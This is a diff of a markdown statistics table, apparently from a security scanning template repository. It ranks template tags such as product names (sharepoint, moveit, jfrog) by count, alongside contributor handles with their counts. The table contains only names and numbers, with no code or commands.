+| linksys                                         |     3 | b4uh0lz                               |     1 |                      |       |          |       |      |       |
+| zendesk                                         |     3 | mrcl0wnlab                            |     1 |                      |       |          |       |      |       |
+| targa                                           |     3 | tangxiaofeng7                         |     1 |                      |       |          |       |      |       |
+| epson                                           |     3 | mariam tariq                          |     1 |                      |       |          |       |      |       |
+| steve                                           |     3 | exceed                                |     1 |                      |       |          |       |      |       |
+| casdoor                                         |     3 | twitter.com/dheerajmadhukar           |     1 |                      |       |          |       |      |       |
+| electron                                        |     3 | ayadi                                 |     1 |                      |       |          |       |      |       |
+| thinfinity                                      |     3 | colbyjack1134                         |     1 |                      |       |          |       |      |       |
+| openbmcs                                        |     3 | xshuden                               |     1 |                      |       |          |       |      |       |
+| jfrog                                           |     3 | calumjelrick                          |     1 |                      |       |          |       |      |       |
+| flexvnf                                         |     3 | miroslavsotak                         |     1 |                      |       |          |       |      |       |
+| fanwei                                          |     3 | th3.d1p4k                             |     1 |                      |       |          |       |      |       |
+| forum                                           |     3 | anon-artist                           |     1 |                      |       |          |       |      |       |
+| gradle                                          |     3 | arall                                 |     1 |                      |       |          |       |      |       |
+| glassfish                                       |     3 | jub0bs                                |     1 |                      |       |          |       |      |       |
+| lansweeper                                      |     3 | mzack9999                             |     1 |                      |       |          |       |      |       |
+| mpsec                                           |     3 | alex                                  |     1 |                      |       |          |       |      |       |
+| sharepoint                                      |     3 | king-alexander                        |     1 |                      |       |          |       |      |       |
+| moveit                                          |     3 | ooooooo_q                             |     1 |                      |       |          |       |      |       |
+| nc                                              |     3 | h4kux                                 |     1 |                      |       |          |       |      |       |
+| influxdb                                        |     3 | official_blackhat13                   |     1 |                      |       |          |       |      |       |
+| ampps                                           |     3 | shockwave                             |     1 |                      |       |          |       |      |       |
+| processwire                                     |     3 | _harleo                               |     1 |                      |       |          |       |      |       |
+| actuator                                        |     3 | brabbit10                             |     1 |                      |       |          |       |      |       |
+| xerox                                           |     3 | oscarintherocks                       |     1 |                      |       |          |       |      |       |
+| subrion                                         |     3 | caon                                  |     1 |                      |       |          |       |      |       |
+| figma                                           |     3 | elder tao                             |     1 |                      |       |          |       |      |       |
+| circleci                                        |     3 | akokonunes                            |     1 |                      |       |          |       |      |       |
+| listserv                                        |     3 | bjhulst                               |     1 |                      |       |          |       |      |       |
+| empirecms                                       |     3 | couskito                              |     1 |                      |       |          |       |      |       |
+| fanruan                                         |     3 | soyelmago                             |     1 |                      |       |          |       |      |       |
+| wordfence                                       |     3 | mrharshvardhan                        |     1 |                      |       |          |       |      |       |
+| axis2                                           |     3 | shifacyclewla                         |     1 |                      |       |          |       |      |       |
+| backdrop                                        |     3 | mah3sec_                              |     1 |                      |       |          |       |      |       |
+| credential                                      |     3 | 0ut0fb4nd                             |     1 |                      |       |          |       |      |       |
+| dotcms                                          |     3 | ling                                  |     1 |                      |       |          |       |      |       |
+| webalizer                                       |     3 | lethargynavigator                     |     1 |                      |       |          |       |      |       |
+| jeesns                                          |     3 | becivells                             |     1 |                      |       |          |       |      |       |
+| rancher                                         |     3 | geraldino2                            |     1 |                      |       |          |       |      |       |
+| dzzoffice                                       |     3 | xcapri                                |     1 |                      |       |          |       |      |       |
+| airtable                                        |     3 | aravind                               |     1 |                      |       |          |       |      |       |
+| selenium                                        |     3 | rotemreiss                            |     1 |                      |       |          |       |      |       |
+| e-cology                                        |     3 | nerrorsec                             |     1 |                      |       |          |       |      |       |
+| wbce                                            |     3 | _c0wb0y_                              |     1 |                      |       |          |       |      |       |
+| spip                                            |     3 | stupidfish                            |     1 |                      |       |          |       |      |       |
+| webmail                                         |     3 | orpheus                               |     1 |                      |       |          |       |      |       |
+| purchase-order-management-system                |     3 | unp4ck                                |     1 |                      |       |          |       |      |       |
+| piwigo                                          |     3 | elitebaz                              |     1 |                      |       |          |       |      |       |
+| cluster                                         |     3 | lucky0x0d                             |     1 |                      |       |          |       |      |       |
+| telnet                                          |     3 | sickwell                              |     1 |                      |       |          |       |      |       |
+| graph                                           |     3 | elouhi                                |     1 |                      |       |          |       |      |       |
+| magnolia                                        |     3 | daffianfo                             |     1 |                      |       |          |       |      |       |
+| purchase-order                                  |     3 | xeldax                                |     1 |                      |       |          |       |      |       |
+| tableau                                         |     3 | petergrifin                           |     1 |                      |       |          |       |      |       |
+| selea                                           |     3 | axrk                                  |     1 |                      |       |          |       |      |       |
+| asus                                            |     3 | aceseven (digisec360)                 |     1 |                      |       |          |       |      |       |
+| evlink                                          |     3 | luskabol                              |     1 |                      |       |          |       |      |       |
+| discourse                                       |     3 | pulsesecurity.co.nz                   |     1 |                      |       |          |       |      |       |
+| unifi                                           |     3 | exid                                  |     1 |                      |       |          |       |      |       |
+| matrix                                          |     3 | intx0x80                              |     1 |                      |       |          |       |      |       |
+| rlm                                             |     3 | s1r1u5_                               |     1 |                      |       |          |       |      |       |
+| ixcache                                         |     3 | kba@sogeti_esec                       |     1 |                      |       |          |       |      |       |
+| bitrix                                          |     3 | aresx                                 |     1 |                      |       |          |       |      |       |
+| telegram                                        |     3 | galoget                               |     1 |                      |       |          |       |      |       |
+| zeroshell                                       |     3 | duty_1g                               |     1 |                      |       |          |       |      |       |
+| cas                                             |     3 | bernardo rodrigues                    |     1 |                      |       |          |       |      |       |
 |                                                 |       | @bernardofsr                          |       |                      |       |          |       |      |       |
-| loytec                                          |     3 | mantissts                             |     1 |                      |       |          |       |      |       |
-| flexvnf                                         |     3 | tirtha                                |     1 |                      |       |          |       |      |       |
-| steve                                           |     3 | dwbzn                                 |     1 |                      |       |          |       |      |       |
-| asus                                            |     3 | hakluke                               |     1 |                      |       |          |       |      |       |
-| etsy                                            |     3 | osamahamad                            |     1 |                      |       |          |       |      |       |
-| fileman                                         |     3 | 1nf1n7y                               |     1 |                      |       |          |       |      |       |
-| etcd                                            |     3 | compr00t                              |     1 |                      |       |          |       |      |       |
-| ueditor                                         |     3 | remi gascou (podalirius)              |     1 |                      |       |          |       |      |       |
-| dahua                                           |     3 | andysvints                            |     1 |                      |       |          |       |      |       |
-| covenant                                        |     3 | aravind                               |     1 |                      |       |          |       |      |       |
-| movable                                         |     3 | supr4s                                |     1 |                      |       |          |       |      |       |
-| r-seenet                                        |     3 | cookiehanhoan                         |     1 |                      |       |          |       |      |       |
-| yzmcms                                          |     3 | absshax                               |     1 |                      |       |          |       |      |       |
-| flutter                                         |     3 | miroslavsotak                         |     1 |                      |       |          |       |      |       |
-| forum                                           |     3 | jaimin gondaliya                      |     1 |                      |       |          |       |      |       |
-| sftp                                            |     3 | apt-mirror                            |     1 |                      |       |          |       |      |       |
-| saltstack                                       |     3 | arjunchandarana                       |     1 |                      |       |          |       |      |       |
-| webmail                                         |     3 | hazana                                |     1 |                      |       |          |       |      |       |
-| finecms                                         |     3 | kaizensecurity                        |     1 |                      |       |          |       |      |       |
-| fastly                                          |     3 | 2rs3c                                 |     1 |                      |       |          |       |      |       |
-| subrion                                         |     3 | furkansayim                           |     1 |                      |       |          |       |      |       |
-| epson                                           |     3 | _harleo                               |     1 |                      |       |          |       |      |       |
-| superset                                        |     3 | caon                                  |     1 |                      |       |          |       |      |       |
-| sitemap                                         |     3 | millermedia                           |     1 |                      |       |          |       |      |       |
-| ansible                                         |     3 | pbuff07                               |     1 |                      |       |          |       |      |       |
-| openam                                          |     3 | professorabhay                        |     1 |                      |       |          |       |      |       |
-| nuuo                                            |     3 | manuelbua                             |     1 |                      |       |          |       |      |       |
-| axway                                           |     3 | djoevanka                             |     1 |                      |       |          |       |      |       |
-| axis2                                           |     3 | kareemse1im                           |     1 |                      |       |          |       |      |       |
-| servicenow                                      |     3 | tim_koopmans                          |     1 |                      |       |          |       |      |       |
-| nuget                                           |     3 | marcio mendes                         |     1 |                      |       |          |       |      |       |
-| sysaid                                          |     3 | furkansenan                           |     1 |                      |       |          |       |      |       |
-| discourse                                       |     3 | luqmaan hadia                         |     1 |                      |       |          |       |      |       |
-| hongfan                                         |     3 | ayadi                                 |     1 |                      |       |          |       |      |       |
-| aptus                                           |     3 | francescocarlucci                     |     1 |                      |       |          |       |      |       |
-| poms                                            |     3 | j33n1k4                               |     1 |                      |       |          |       |      |       |
-| selea                                           |     3 | f1she3                                |     1 |                      |       |          |       |      |       |
-| apollo                                          |     3 | harshinsecurity                       |     1 |                      |       |          |       |      |       |
-| purchase-order-management-system                |     3 | kishore krishna (sillydaddy)          |     1 |                      |       |          |       |      |       |
-| influxdb                                        |     3 | daviey                                |     1 |                      |       |          |       |      |       |
-| netlify                                         |     3 | king-alexander                        |     1 |                      |       |          |       |      |       |
-| osticket                                        |     3 | gboddin                               |     1 |                      |       |          |       |      |       |
-| trendnet                                        |     3 | elmahdi                               |     1 |                      |       |          |       |      |       |
-| moveit                                          |     3 | jub0bs                                |     1 |                      |       |          |       |      |       |
-| magnolia                                        |     3 | adnanekhan                            |     1 |                      |       |          |       |      |       |
-| webkul-qloapps                                  |     3 | berkdusunur                           |     1 |                      |       |          |       |      |       |
-| 3cx                                             |     3 | 0xrod                                 |     1 |                      |       |          |       |      |       |
-| graph                                           |     3 | chron0x                               |     1 |                      |       |          |       |      |       |
-| piwigo                                          |     3 | omarjezi                              |     1 |                      |       |          |       |      |       |
-| sharepoint                                      |     3 | wlayzz                                |     1 |                      |       |          |       |      |       |
-| webcam                                          |     3 | r3nz0                                 |     1 |                      |       |          |       |      |       |
-| webalizer                                       |     3 | ling                                  |     1 |                      |       |          |       |      |       |
-| circleci                                        |     3 | knassar702                            |     1 |                      |       |          |       |      |       |
-| backdrop                                        |     3 | breno_css                             |     1 |                      |       |          |       |      |       |
-| digitalrebar                                    |     3 | fq_hsu                                |     1 |                      |       |          |       |      |       |
-| netdata                                         |     3 | h4kux                                 |     1 |                      |       |          |       |      |       |
-| rocketchat                                      |     3 | mohammad reza omrani |                |     1 |                      |       |          |       |      |       |
+| dom                                             |     3 | realexp3rt                            |     1 |                      |       |          |       |      |       |
+| yzmcms                                          |     3 | ph33rr                                |     1 |                      |       |          |       |      |       |
+| osticket                                        |     3 | bibeksapkota (sar00n)                 |     1 |                      |       |          |       |      |       |
+| craftcms                                        |     3 | tirtha_mandal                         |     1 |                      |       |          |       |      |       |
+| payara                                          |     3 | w0tx                                  |     1 |                      |       |          |       |      |       |
+| pega                                            |     3 | mayankpandey01                        |     1 |                      |       |          |       |      |       |
+| itop                                            |     3 | petruknisme                           |     1 |                      |       |          |       |      |       |
+| zerof                                           |     3 | gpiechnik2                            |     1 |                      |       |          |       |      |       |
+| e-mobile                                        |     3 | bughuntersurya                        |     1 |                      |       |          |       |      |       |
+| clusterengine                                   |     3 | secthebit                             |     1 |                      |       |          |       |      |       |
+| monstra                                         |     3 | shiar                                 |     1 |                      |       |          |       |      |       |
+| axis                                            |     3 | amnotacat                             |     1 |                      |       |          |       |      |       |
+| splunk                                          |     3 | aron molnar                           |     1 |                      |       |          |       |      |       |
+| fastly                                          |     3 | udinchan                              |     1 |                      |       |          |       |      |       |
+| covenant                                        |     3 | bugvsme                               |     1 |                      |       |          |       |      |       |
+| netlify                                         |     3 | ahmed sherif                          |     1 |                      |       |          |       |      |       |
+| etcd                                            |     3 | barthy.koeln                          |     1 |                      |       |          |       |      |       |
+| modem                                           |     3 | xianke                                |     1 |                      |       |          |       |      |       |
+| rocketchat                                      |     3 | jas37                                 |     1 |                      |       |          |       |      |       |
+| sharefile                                       |     3 | bartu utku sarp                       |     1 |                      |       |          |       |      |       |
+| pulsar                                          |     3 | naglis                                |     1 |                      |       |          |       |      |       |
+| geowebserver                                    |     3 | prettyboyaaditya                      |     1 |                      |       |          |       |      |       |
+| http                                            |     3 | freakyclown                           |     1 |                      |       |          |       |      |       |
+| digitalrebar                                    |     3 | ola456                                |     1 |                      |       |          |       |      |       |
+| rubygems                                        |     3 | nielsing                              |     1 |                      |       |          |       |      |       |
+| nuget                                           |     3 | hakimkt                               |     1 |                      |       |          |       |      |       |
+| env                                             |     3 | marcio mendes                         |     1 |                      |       |          |       |      |       |
+| httpbin                                         |     3 | piyushchhiroliya                      |     1 |                      |       |          |       |      |       |
+| fileman                                         |     3 | 0h1in9e                               |     1 |                      |       |          |       |      |       |
+| messaging                                       |     3 | miryangjung                           |     1 |                      |       |          |       |      |       |
+| nuxtjs                                          |     3 | unknown                               |     1 |                      |       |          |       |      |       |
+| key                                             |     3 | phyr3wall                             |     1 |                      |       |          |       |      |       |
+| sony                                            |     3 | alevsk                                |     1 |                      |       |          |       |      |       |
+| superadmin                                      |     3 | pussycat0                             |     1 |                      |       |          |       |      |       |
+| apollo                                          |     3 | d0rkerdevil                           |     1 |                      |       |          |       |      |       |
+| sftp                                            |     3 | chron0x                               |     1 |                      |       |          |       |      |       |
+| openwrt                                         |     3 | therealtoastycat                      |     1 |                      |       |          |       |      |       |
+| fuelcms                                         |     3 | notsoevilweasel                       |     1 |                      |       |          |       |      |       |
+| petya                                           |     3 | dk999                                 |     1 |                      |       |          |       |      |       |
+| mantisbt                                        |     3 | harshinsecurity                       |     1 |                      |       |          |       |      |       |
+| saltstack                                       |     3 | undefl0w                              |     1 |                      |       |          |       |      |       |
+| ansible                                         |     3 | jna1                                  |     1 |                      |       |          |       |      |       |
+| redash                                          |     3 | deena                                 |     1 |                      |       |          |       |      |       |
+| shell                                           |     3 | izn0u                                 |     1 |                      |       |          |       |      |       |
+| waf                                             |     3 | ptonewreckin                          |     1 |                      |       |          |       |      |       |
+| kingsoft                                        |     3 | supr4s                                |     1 |                      |       |          |       |      |       |
+| h3c                                             |     3 | yuansec                               |     1 |                      |       |          |       |      |       |
+| lighttpd                                        |     3 | queencitycyber                        |     1 |                      |       |          |       |      |       |
+| trixbox                                         |     3 | xstp                                  |     1 |                      |       |          |       |      |       |
+| drawio                                          |     3 | 5up3r541y4n                           |     1 |                      |       |          |       |      |       |
+| buffalo                                         |     3 | jeya.seelan                           |     1 |                      |       |          |       |      |       |
+| hsphere                                         |     3 | kiks7                                 |     1 |                      |       |          |       |      |       |
+| kavita                                          |     3 | noah @thesubtlety                     |     1 |                      |       |          |       |      |       |
+| eshop                                           |     3 | kareemse1im                           |     1 |                      |       |          |       |      |       |
+| aptus                                           |     3 | mbmy                                  |     1 |                      |       |          |       |      |       |
+| adafruit                                        |     3 | pbuff07                               |     1 |                      |       |          |       |      |       |
+| chamilo                                         |     3 | sak1                                  |     1 |                      |       |          |       |      |       |
+| ueditor                                         |     3 | hexcat                                |     1 |                      |       |          |       |      |       |
+| flutter                                         |     3 | viniciuspereiras                      |     1 |                      |       |          |       |      |       |
+| contentful                                      |     3 | mubassirpatel                         |     1 |                      |       |          |       |      |       |
+| mapbox                                          |     3 | mabdullah22                           |     1 |                      |       |          |       |      |       |
+| openam                                          |     3 | ipanda                                |     1 |                      |       |          |       |      |       |
+| smb                                             |     3 | c4sper0                               |     1 |                      |       |          |       |      |       |
+| synology                                        |     3 | liquidsec                             |     1 |                      |       |          |       |      |       |
+| js                                              |     3 | pudsec                                |     1 |                      |       |          |       |      |       |
+| linux                                           |     3 | luisfelipe146                         |     1 |                      |       |          |       |      |       |
+| idrac                                           |     3 | lark lab                              |     1 |                      |       |          |       |      |       |
+| globalprotect                                   |     3 | hczdmr                                |     1 |                      |       |          |       |      |       |
+| temenos                                         |     3 | thebinitghimire                       |     1 |                      |       |          |       |      |       |
+| sitemap                                         |     3 | team syslifters / christoph           |     1 |                      |       |          |       |      |       |
+|                                                 |       | mahrl                                 |       |                      |       |          |       |      |       |
+| sysaid                                          |     3 | dwbzn                                 |     1 |                      |       |          |       |      |       |
+| securepoint                                     |     3 | y0no                                  |     1 |                      |       |          |       |      |       |
+| finecms                                         |     3 | kchason                               |     1 |                      |       |          |       |      |       |
+| loytec                                          |     3 | dorkerdevil                           |     1 |                      |       |          |       |      |       |
+| pypi                                            |     3 | mohammad reza omrani |                |     1 |                      |       |          |       |      |       |
 |                                                 |       | @omranisecurity                       |       |                      |       |          |       |      |       |
-| bigant                                          |     3 | dali                                  |     1 |                      |       |          |       |      |       |
-| contentful                                      |     3 | petruknisme                           |     1 |                      |       |          |       |      |       |
-| monstra                                         |     3 | adrianmf                              |     1 |                      |       |          |       |      |       |
-| jfrog                                           |     3 | c4sper0                               |     1 |                      |       |          |       |      |       |
-| cnvd2022                                        |     3 | yashgoti                              |     1 |                      |       |          |       |      |       |
-| h3c                                             |     3 | ofjaaah                               |     1 |                      |       |          |       |      |       |
-| telegram                                        |     3 | xeldax                                |     1 |                      |       |          |       |      |       |
-| twitter                                         |     3 | philippdelteil                        |     1 |                      |       |          |       |      |       |
-| gradle                                          |     3 | 0ut0fb4nd                             |     1 |                      |       |          |       |      |       |
-| openai                                          |     3 | undefl0w                              |     1 |                      |       |          |       |      |       |
-| totolink                                        |     3 | thelicato                             |     1 |                      |       |          |       |      |       |
-| key                                             |     3 | notsoevilweasel                       |     1 |                      |       |          |       |      |       |
-| mantisbt                                        |     3 | mah3sec_                              |     1 |                      |       |          |       |      |       |
-| gateway                                         |     3 | miryangjung                           |     1 |                      |       |          |       |      |       |
-| kingsoft                                        |     3 | ahmed sherif                          |     1 |                      |       |          |       |      |       |
-| octobercms                                      |     3 | patrick pirker                        |     1 |                      |       |          |       |      |       |
-| empirecms                                       |     3 | charanrayudu                          |     1 |                      |       |          |       |      |       |
-| ixcache                                         |     3 | hczdmr                                |     1 |                      |       |          |       |      |       |
-| sony                                            |     3 | geraldino2                            |     1 |                      |       |          |       |      |       |
-| geowebserver                                    |     3 | exceed                                |     1 |                      |       |          |       |      |       |
-| lansweeper                                      |     3 | duty_1g                               |     1 |                      |       |          |       |      |       |
-| dom                                             |     3 | none                                  |     1 |                      |       |          |       |      |       |
-| env                                             |     3 | j3ssie/geraldino2                     |     1 |                      |       |          |       |      |       |
-| zerof                                           |     3 | open-sec                              |     1 |                      |       |          |       |      |       |
-| zeroshell                                       |     3 | juicypotato1                          |     1 |                      |       |          |       |      |       |
-| drawio                                          |     3 | aron molnar                           |     1 |                      |       |          |       |      |       |
-| rackn                                           |     3 | udinchan                              |     1 |                      |       |          |       |      |       |
-| password                                        |     3 | dk999                                 |     1 |                      |       |          |       |      |       |
-| mailgun                                         |     3 | push4d                                |     1 |                      |       |          |       |      |       |
-| mcafee                                          |     3 | httpvoid                              |     1 |                      |       |          |       |      |       |
-| yii                                             |     3 | micha3lb3n                            |     1 |                      |       |          |       |      |       |
-| droneci                                         |     3 | jiheon-dev                            |     1 |                      |       |          |       |      |       |
-| kfm                                             |     3 | aaronchen0                            |     1 |                      |       |          |       |      |       |
-| globalprotect                                   |     3 | topscoder                             |     1 |                      |       |          |       |      |       |
-| idrac                                           |     3 | b0rn2r00t                             |     1 |                      |       |          |       |      |       |
-| pip                                             |     3 | nagli                                 |     1 |                      |       |          |       |      |       |
-| smb                                             |     3 | ruppde                                |     1 |                      |       |          |       |      |       |
-| glassfish                                       |     3 | jteles                                |     1 |                      |       |          |       |      |       |
-| rancher                                         |     3 | spac3wh1te                            |     1 |                      |       |          |       |      |       |
-| processwire                                     |     3 | dorkerdevil                           |     1 |                      |       |          |       |      |       |
-| fanruan                                         |     3 | xstp                                  |     1 |                      |       |          |       |      |       |
-| segment                                         |     3 | p-l-                                  |     1 |                      |       |          |       |      |       |
-| trixbox                                         |     3 | alevsk                                |     1 |                      |       |          |       |      |       |
-| pega                                            |     3 | bartu utku sarp                       |     1 |                      |       |          |       |      |       |
-| getsimple                                       |     3 | ramondunker                           |     1 |                      |       |          |       |      |       |
-| rubygems                                        |     3 | natto97                               |     1 |                      |       |          |       |      |       |
-| redash                                          |     3 | myst7ic                               |     1 |                      |       |          |       |      |       |
-| casdoor                                         |     3 | rotembar                              |     1 |                      |       |          |       |      |       |
-| dreambox                                        |     3 | patralos                              |     1 |                      |       |          |       |      |       |
-| buffalo                                         |     3 | soyelmago                             |     1 |                      |       |          |       |      |       |
-| actuator                                        |     3 | affix                                 |     1 |                      |       |          |       |      |       |
-| openbmcs                                        |     3 | kresec                                |     1 |                      |       |          |       |      |       |
-| js                                              |     3 | hateshape                             |     1 |                      |       |          |       |      |       |
-| voipmonitor                                     |     3 | calumjelrick                          |     1 |                      |       |          |       |      |       |
-| angular                                         |     3 | deena                                 |     1 |                      |       |          |       |      |       |
-| tableau                                         |     3 | ola456                                |     1 |                      |       |          |       |      |       |
-| yonyou                                          |     3 | oscarintherocks                       |     1 |                      |       |          |       |      |       |
-| cyberoam                                        |     2 | dievus                                |     1 |                      |       |          |       |      |       |
-| fortinac                                        |     2 | manasmbellani                         |     1 |                      |       |          |       |      |       |
-| genieacs                                        |     2 | yavolo                                |     1 |                      |       |          |       |      |       |
-| ametys                                          |     2 | numan türle                           |     1 |                      |       |          |       |      |       |
-| databricks                                      |     2 | erethon                               |     1 |                      |       |          |       |      |       |
-| konga                                           |     2 | prettyboyaaditya                      |     1 |                      |       |          |       |      |       |
-| puppetdb                                        |     2 | pratik khalane                        |     1 |                      |       |          |       |      |       |
-| etherpad                                        |     2 | matt miller                           |     1 |                      |       |          |       |      |       |
-| clansphere                                      |     2 | jrolf                                 |     1 |                      |       |          |       |      |       |
-| commax                                          |     2 | pepitoh                               |     1 |                      |       |          |       |      |       |
-| acrolinx                                        |     2 | sid ahmed malaoui @ realistic         |     1 |                      |       |          |       |      |       |
+| bruteforce                                      |     3 | akash.c                               |     1 |                      |       |          |       |      |       |
+| weiphp                                          |     3 | cookiehanhoan                         |     1 |                      |       |          |       |      |       |
+| segment                                         |     3 | aringo-bf                             |     1 |                      |       |          |       |      |       |
+| shiro                                           |     3 | francescocarlucci                     |     1 |                      |       |          |       |      |       |
+| servicenow                                      |     3 | sid ahmed malaoui @ realistic         |     1 |                      |       |          |       |      |       |
 |                                                 |       | security                              |       |                      |       |          |       |      |       |
-| vidyo                                           |     2 | jcockhren                             |     1 |                      |       |          |       |      |       |
-| checkpoint                                      |     2 |                                       |       |                      |       |          |       |      |       |
-| livehelperchat                                  |     2 |                                       |       |                      |       |          |       |      |       |
-| youtube                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| mailgun                                         |     3 | lingtren                              |     1 |                      |       |          |       |      |       |
+| webadmin                                        |     3 | p-l-                                  |     1 |                      |       |          |       |      |       |
+| nuuo                                            |     3 | aaban solutions                       |     1 |                      |       |          |       |      |       |
+| pip                                             |     3 | fmunozs                               |     1 |                      |       |          |       |      |       |
+| etsy                                            |     3 | vzamanillo                            |     1 |                      |       |          |       |      |       |
+| octobercms                                      |     3 | luqmaan hadia                         |     1 |                      |       |          |       |      |       |
+| r-seenet                                        |     3 | micha3lb3n                            |     1 |                      |       |          |       |      |       |
+| kfm                                             |     3 | arliya                                |     1 |                      |       |          |       |      |       |
+| lotus                                           |     3 | danigoland                            |     1 |                      |       |          |       |      |       |
+| twitter                                         |     3 | iphantasmic                           |     1 |                      |       |          |       |      |       |
+| intercom                                        |     3 | jonathanwalker                        |     1 |                      |       |          |       |      |       |
+| axway                                           |     3 | tehtbl                                |     1 |                      |       |          |       |      |       |
+| angular                                         |     3 | kr1shna4garwal                        |     1 |                      |       |          |       |      |       |
+| rackn                                           |     3 | ohlinge                               |     1 |                      |       |          |       |      |       |
+| webcam                                          |     3 | 0xtavian                              |     1 |                      |       |          |       |      |       |
+| yii                                             |     3 | pepitoh                               |     1 |                      |       |          |       |      |       |
+| dahua                                           |     3 | mass0ma                               |     1 |                      |       |          |       |      |       |
+| samba                                           |     3 | erethon                               |     1 |                      |       |          |       |      |       |
+| clientid                                        |     3 | jaimin gondaliya                      |     1 |                      |       |          |       |      |       |
+| teamcity                                        |     3 | 0xrod                                 |     1 |                      |       |          |       |      |       |
+| totolink                                        |     3 | shiva (strobes security)              |     1 |                      |       |          |       |      |       |
+| droneci                                         |     3 | 0xelkomy & c0nqr0r                    |     1 |                      |       |          |       |      |       |
+| cloudcenter                                     |     2 | nobody                                |     1 |                      |       |          |       |      |       |
+| backups                                         |     2 | wlayzz                                |     1 |                      |       |          |       |      |       |
+| dynatrace                                       |     2 | evan rubinstien                       |     1 |                      |       |          |       |      |       |
+| graphite                                        |     2 | exploitation                          |     1 |                      |       |          |       |      |       |
+| natshell                                        |     2 | jeya seelan                           |     1 |                      |       |          |       |      |       |
+| places                                          |     2 | ransomsec                             |     1 |                      |       |          |       |      |       |
+| werkzeug                                        |     2 | sicksec                               |     1 |                      |       |          |       |      |       |
+| vigorconnect                                    |     2 |                                       |       |                      |       |          |       |      |       |
+| opsview                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| glowroot                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| upload                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| konga                                           |     2 |                                       |       |                      |       |          |       |      |       |
+| eyesofnetwork                                   |     2 |                                       |       |                      |       |          |       |      |       |
+| kanboard                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| etherpad                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| jitsi                                           |     2 |                                       |       |                      |       |          |       |      |       |
+| portal                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| veeam                                           |     2 |                                       |       |                      |       |          |       |      |       |
+| sidekiq                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| phpldapadmin                                    |     2 |                                       |       |                      |       |          |       |      |       |
+| acunetix                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| livezilla                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| relatedposts                                    |     2 |                                       |       |                      |       |          |       |      |       |
+| sass                                            |     2 |                                       |       |                      |       |          |       |      |       |
+| espeasy                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| fortinac                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| revive                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| ntopng                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| monitoring                                      |     2 |                                       |       |                      |       |          |       |      |       |
+| hadoop                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| phpcollab                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| sequoiadb                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| runner                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| shellshock                                      |     2 |                                       |       |                      |       |          |       |      |       |
+| tiny                                            |     2 |                                       |       |                      |       |          |       |      |       |
+| commax                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| erxes                                           |     2 |                                       |       |                      |       |          |       |      |       |
+| testrail                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| epmm                                            |     2 |                                       |       |                      |       |          |       |      |       |
+| wpqa                                            |     2 |                                       |       |                      |       |          |       |      |       |
+| monitor                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| tplink                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| netsparker                                      |     2 |                                       |       |                      |       |          |       |      |       |
+| circontrol                                      |     2 |                                       |       |                      |       |          |       |      |       |
+| corebos                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| wdcloud                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| jeedom                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| auerswald                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| virustotal                                      |     2 |                                       |       |                      |       |          |       |      |       |
+| modern-events-calendar-lite                     |     2 |                                       |       |                      |       |          |       |      |       |
+| razorpay                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| bomgar                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| gespage                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| otobo                                           |     2 |                                       |       |                      |       |          |       |      |       |
+| flask                                           |     2 |                                       |       |                      |       |          |       |      |       |
+| skycaiji                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| mbean                                           |     2 |                                       |       |                      |       |          |       |      |       |
+| acenet                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| viewpoint                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| audiocodes                                      |     2 |                                       |       |                      |       |          |       |      |       |
+| directorist                                     |     2 |                                       |       |                      |       |          |       |      |       |
+| yealink                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| code42                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| wamp                                            |     2 |                                       |       |                      |       |          |       |      |       |
+| opentsdb                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| accesskey                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| hetzner                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| emqx                                            |     2 |                                       |       |                      |       |          |       |      |       |
+| websocket                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| icecast                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| gryphon                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| eko                                             |     2 |                                       |       |                      |       |          |       |      |       |
+| topsec                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| couchbase                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| eprints                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| ad                                              |     2 |                                       |       |                      |       |          |       |      |       |
+| eventum                                         |     2 |                                       |       |                      |       |          |       |      |       |
+| coinbase                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| clickhouse                                      |     2 |                                       |       |                      |       |          |       |      |       |
+| leostream                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| acereporter                                     |     2 |                                       |       |                      |       |          |       |      |       |
+| domxss                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| jsherp                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| netsus                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| secretkey                                       |     2 |                                       |       |                      |       |          |       |      |       |
+| gopher                                          |     2 |                                       |       |                      |       |          |       |      |       |
+| netmizer                                        |     2 |                                       |       |                      |       |          |       |      |       |
+| pbootcms                                        |     2 |                                       |       |                      |       |          |       |      |       |
